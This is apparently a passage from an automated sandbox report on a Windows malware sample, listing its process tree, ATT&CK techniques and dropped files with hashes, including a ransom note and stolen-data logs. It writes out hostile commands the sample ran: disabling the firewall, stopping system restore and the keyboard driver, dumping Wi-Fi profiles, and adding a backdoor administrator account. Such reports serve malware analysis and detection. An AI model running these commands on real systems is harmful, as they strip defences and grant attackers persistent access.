PID:8
-
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\createshortcut.vbs2⤵
- Executes a VBScript file via the Windows Script Host.
PID:5448
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe"2⤵PID:3864
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop srservice2⤵
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3016
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice3⤵PID:5340
-
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3696
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config i8042prt start= disabled2⤵
- Launches sc.exe
PID:548
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop i8042prt2⤵
- Launches sc.exe
PID:876
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"2⤵PID:5376
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" wlan show profiles2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3800
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" user backdoor P@ssw0rd123 /add2⤵
- Creates a new local user account
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user backdoor P@ssw0rd123 /add3⤵
- Creates a new local user account
PID:2652
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" localgroup administrators backdoor /add2⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators backdoor /add3⤵PID:2984
-
-
-
C:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exeC:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exe1⤵PID:4840
-
C:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exeC:\Users\Admin\AppData\Local\Temp\socolivex.io_nano.exe1⤵PID:1856
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
4PowerShell
1Visual Basic
1Windows Command Shell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Windows Management Instrumentation
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create Account
1Local Account
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
1Indicator Removal
2File Deletion
2Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
- Path C:\ProgramData\SysUpdate\Scr\scr_20260916_084033.jpg
- Size 103KB
- SHA256 68d05a97ec86313950600b8d59e1a419c11aaa75e356849386057122f617b7fe
- MD5 78789a93c8c192fae393df139703e8c4
- SHA1 9df69b2711f462d01cab4984d42611b6c8d7fe3f
- SHA512 a1d31485073e3de1697aabeb3c38415055915378362627e0d2b4c3aa401d3453b01ff5482c4a235c84674cb06db375916410f097dba95bca60add9da6954e9b0
- SSDEEP 1536:SHbzeOXbCM1oyxngAIbPD2v0PiZsdF6f8PSSSSSSSSSSSSSSSSSZSSSSSSSSSSSB:Mbz7XeGnOLcn+XkS
- TLSH T137A3BE478D4C8B87502C83E87E430EAD6F492B0DED913AFF55651ECB7E652620D8E06E
- MD5 SHA1 SHA512 SSDEEP TLSH
- Path C:\SystemVolumeInformation\doc_3.pdf
- Size 86KB
- SHA256 5eac96ea296cb67e5201f1f129c8bb45fcd668275b0eb2c0316d6ae07e578b24
- MD5 77331d38cf213e7cfe8702b988fceca6
- SHA1 54181c9e305b9886469e0c7f64af4a0771f7014b
- SHA512 10cdfe201d6a44846781824b9325c7fc6d079de33f64599ce8b67567c89e179597a0faee33a9ecccc89f667b36e052bbedaef4089a32bd546fb229d88dd2141c
- SSDEEP 1536:WswX6J+necJy6NCBvLS+XprqDUNM5l7nUivSwY4uJRSkezatLRzplL0WyVcsSed:WswX6J+e4N+vLrPSjUivSP4u8z09zpl8
- TLSH T1B9834B379B23FDC1677F3D80E0582A561C883A2B4778666CF9C00E766AE6640DF3E558
- MD5 SHA1 SHA512 SSDEEP TLSH
- Path C:\Users\Admin\AppData\Local\Temp\createshortcut.vbs
- Size 242B
- SHA256 554ed49f4e18b5de8421e443a160dcfb60eaf117eebde9a5379c39809b61ef40
- MD5 743bc289f4aa4c7bb91ba036d67da54c
- SHA1 2b4d73e1b48ed80fd4f912877887d457f7eb89cd
- SHA512 57e08c5852b146c9cdd2d16556862719cf0a3f4bc62be185cd7ac83296fa0b53de2f2a84698e8d6b7e5e3fae1746a2f346d5f2b544d9684804ece639a00887ce
- TLSH T18ED0A78BB24DC6B90001223B81F3DD4CDAA5582D3B17BF705AA9ED4E329188589F6543
- MD5 SHA1 SHA512 TLSH
- Path C:\Users\Admin\AppData\Local\Temp\del.bat
- Size 59B
- SHA256 a51f2a0f053ac35b4158bb02b75421ab3698e1d0ee4f926abf1bae3af1570c53
- MD5 9cecbebdcdd60358132849714a3b82f7
- SHA1 be6e20834a5726f3742f05e6bdfaff16118b147f
- SHA512 7b48bd66b4c741d2de2e8b7bc0eab8f438ddc1ed0c73e8b70add9bee400f6640f692884965032616e2d6911a22a17d1d3762421aa49fe021660c9052cfc0675a
- TLSH T13DA002620F961E5469529E5AD73425239D1F104CD1390012F05232903DA98DE0EC2144
- MD5 SHA1 SHA512 TLSH
- Path C:\Users\Admin\AppData\Local\Temp\temp_steal.log
- Size 18KB
- SHA256 c5437496b39ead26c88b07d9f950e7ebbdc7f70bc1ca514e2a57977071b60e9c
- MD5 5f2cb72b646b736a05f13ccd41b575fd
- SHA1 aa857e2174a2f29d73fdfd003cc87dce9e6ab448
- SHA512 05629d61ce56e69f430a01f547de060151fbc9d91bb7a8d5b1d9991bdd0be14934ba4a4101590bfd96590a64f430c3c55e0bc21f5c93861f48056754759976e0
- SSDEEP 192:25j6NOrj6Kpj6NOrj6KzSPMqCprfJjeSPMqCprfJjOfeyN:25eNmeKpeNmeKWUzbUzMfeyN
- TLSH T1CE92E6B243926CD0329616CBC166091DDFBB4B27E40B16CC66712C6F139DF29EAD9873
- MD5 SHA1 SHA512 SSDEEP TLSH
- Path C:\Users\Admin\AppData\Local\Temp\temp_steal.log
- Size 266B
- SHA256 f6e50cc3edeb81cdfca9a69437b2b0fc510c8e6c6a3d981694f915f6a9e3ce4f
- MD5 f60a0995bd1a871c3626b644aaa70b49
- SHA1 278c3d2d50a6a1f89239004d9874a033e5f2ccce
- SHA512 a0cfc974e4a9b7e8a161e41b9123f88df0e73cf165ae4695c14cfb9ad61b407b8bf4afad62e9900907f8539fca0a0d7220071d31f8254dedc1498226ffbf34d6
- TLSH T146D02B53CEC15311F0A1B8061970282CA53FEC1F54E081AD578202647D720C17B78122
- MD5 SHA1 SHA512 TLSH
- Path C:\Users\Admin\AppData\Local\Temp\temp_steal.log
- Size 258KB
- SHA256 82e063fe4a4e6286d6c9f2a9dbfc8ece13a33e21f0894fa8afb2a551a929b8fb
- MD5 09c1833d652cbc1d7eaa778a931c17cd
- SHA1 eb623de2ff191f29fb5b72b79d72fbd888014c7b
- SHA512 b2655a325e442fb5bbff6415ab1b93f9c4376aa72a076ee0888e96a01c70e845d3549d719726daa64d0b15ee91002cc53d912497e61a7be15265dee931117182
- SSDEEP 1536:ae8Df1Tc3TwRhEkUQl1EZf+VDYaEt13WEiMT4+0RQuCrRrLTBRaMM3CWsCpdNfH:a/f1I3QhhUO1YOS3nDAQjrR1RaZdB
- TLSH T1D2444A30C2F39E6645951E6B181633D1AC38B7B7D1EC84FF71A6AE67F0779A2C248244
- MD5 SHA1 SHA512 SSDEEP TLSH
- Path C:\Users\Admin\Desktop\RANSOM_NOTE.txt
- Size 177B
- SHA256 bfd4ed4bcd78100294aeaee2c2b4b8e37fb372b61cdcaa2a14f50ebe4b708e93
- MD5 c381da16f24527b361930429b75608ad
- SHA1 cc68fc2b7246e2b7611b3a1798a7dd3ad5b1c912
- SHA512 e79ae7b36ed481285d8fd080a69e080b637b0eaff67bcb53d0f27c89a984dd70f913d1f69cb306e0b96116b898227814eea36e8e3cfd03302c4455b28da89545
- TLSH T121C0C00B3EC4377822CC21E209018C12914EEA0CAA044254022BC9109EA496D30D44B3
- MD5 SHA1 SHA512 TLSH
- Path C:\Users\Admin\Desktop\READ_ME_NANOCORE.txt
- Size 145B
- SHA256 7057e5f2042a9706c5d18b7d05214373577eb0293599d361bf66cfba3a3eee4f
- MD5 d7ea02f4c4953d6a3f52b5d0ecbeb047
- SHA1 ce3a66707cabbbeaa0980b91d3b6271fc84145cb
- SHA512 441ac2261f8c29eed640bdddfd5195f9fe5fe5fb0f08a77bbebdb4507819e8717855e5485f554986eb0f69ee55d1fa5939c3f7dc84a333f9d78a15973df56f70
- TLSH T156C02B572EE03298B1C036C20A0A4CA2A76D470CD605C6582A2FC42033001EE2E41130
- MD5 SHA1 SHA512 TLSH
- Path C:\Users\Admin\Desktop\stolen_data_here.txt
- Size 24KB
- SHA256 34c11e2e955542cc47cab9a8afeca69be01ba59ffa14851276b3ac0248f64096
- MD5 1c5da16093e92726052fa16b58ce5978
- SHA1 6fbb9c240054ed3d8dc74dfc49bf8ab96d2f0458
- SHA512 e050baf58efb71e783654b801f19ccd80701f372bf3fdc850f206010b1f73568c66f3267a501251c09664b16c059d5b03ab81c4ca5866fc740510dfabbb7c264
- SSDEEP 192:6Jj6NO3j6KZj6NO3j6KjSPMqCprfJjmSPMqCprfJjGfeynfey6feyN:6JeNeeKZeNeeKGUzHUzofeynfey6feyN
- TLSH T1D3B2C5B34381B8C0329727CBC06A4D5E9EB75F27E81766CCA6712C5F126DE18E1D9863
- MD5 SHA1 SHA512 SSDEEP TLSH
- Path C:\Users\Admin\Desktop\stolen_data_here.txt
- Size 418B
- SHA256 1938f07d81006804e31b0ac1a6581e4ebeafb0702f7b5c2cecc1a81807a1dd8c
- MD5 e0b2e3c2d8224a446e99516519666196
- SHA1 589357338916db15476f5ae9b0670154fcf3004a
- SHA512 7216e52e7a1599652c21fb8ed3f90e0b6046efda8979a91f3f0017979e18e4308daf72b9d31d04f85daf5cc0464c74a74ea290e6b21a03f04a13b4c5513b2f39
- TLSH T17AE065B6CDC982D0F055BA02245C78A7563FE97EB491807DE24620B65531388AA7C116
- MD5 SHA1 SHA512 TLSH
- Path C:\Users\Admin\Desktop\stolen_data_here.txt
- Size 258KB
- SHA256 a3cf9586ef48da3a2fc9302755d53abd1f44eb45123de7897998a9d3eb1b4254
- MD5 77e9e7fcb657fb003d2157f14f57421f
- SHA1 1a8d79700f504e14a1ad9c704b75122879ce1065
- SHA512 ac64e7cf68b7f038348b59747bb981334d822655f68b932eea6933e7859ea9e49ecbd43d4f297041b5d1af85e2475ee7143a1a9e275bb1de0a74e62fdd7cd5c6
- SSDEEP 1536:0e8Df1Th3TwRhEkjQl1EZf+VDYaEt13WEiMT4+0RQuCrRrLTBRaMM3CWsCpdNfH:0/f193QhhjO1YOS3nDAQjrR1RaZdB
- TLSH T11F444A30C6F39E6645951E6B180633D1AC38B7B7D1EC84FF71A6AE67F0779A2C248244
- MD5 SHA1 SHA512 SSDEEP TLSH
- Path C:\Users\Admin\Documents\invoice_2.pdf
- Size 86KB
- SHA256 9f23fa5a00f2d8d3b7a04aa412cb9abdc673f8619ecf98e054729d17b8332a64
- MD5 e869d50b82d1c484becf395411e51e59
- SHA1 546c897eaa9f0fdbe66b53a9d3bfe835f91482b1
- SHA512 9263295c13edd6f2d832fe40adf667cc9f1a37e8c4f1e517564abf21338e5737a03cfb67becd118719603fa909392dfb27851ab42496203183c719d2015ba99f
- SSDEEP 1536:LswX6J+necJy6NCBvLS+XprqDUNM5l7nUivSwY4uJRSkezatLRzplL0WyVcsSed:LswX6J+e4N+vLrPSjUivSP4u8z09zpl8
- TLSH T172834B379B23FDC1677F3D80E0582A561C883A2B4778666CF9C00E766AE6640DF3E558
- MD5 SHA1 SHA512 SSDEEP TLSH